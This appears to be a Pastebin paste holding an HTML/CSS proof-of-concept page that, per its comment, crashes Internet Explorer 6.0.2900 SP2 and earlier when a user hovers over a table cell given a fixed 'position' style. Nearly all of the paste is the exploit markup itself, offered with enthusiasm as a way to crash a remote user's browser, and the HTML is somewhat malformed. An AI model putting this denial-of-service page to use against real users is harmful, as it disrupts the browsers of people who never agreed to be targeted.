Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!-- Because I am so enamored by browser flaws (for some unknown reason) I have added an exploit I found on the web, that shows how to create a CSS table that crashes a remote user's browser. IE suffers from a DoS vulnerability in which a remote user's Internet Explorer session can be crashed when hovering their cursor over a specially made table. The fault occurs when the "position" CSS attribute is set to a table cell. This results in an 'unhandled exception in iexplorer.exe(MSHTML.DLL)'. This fault is found in Internet Explorer version 6.0.2900 SP2 and prior -->
- <html>
- <head>
- </style>
- <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
- <title>IE-Crash< / title>
- <style type="text/css">
- #header{
- position: fixed;
- height: 761px;
- width: 1268;
- }
- </style>
- </head>
- <body>
- <table border="2" cellpadding="0" cellspacing="0" width="797" height="343" align="center">
- <tr>
- <td id="header" valign="top">
- </td>
- <td valign="top">
- </td>
- </table>
Advertisement
Advertisement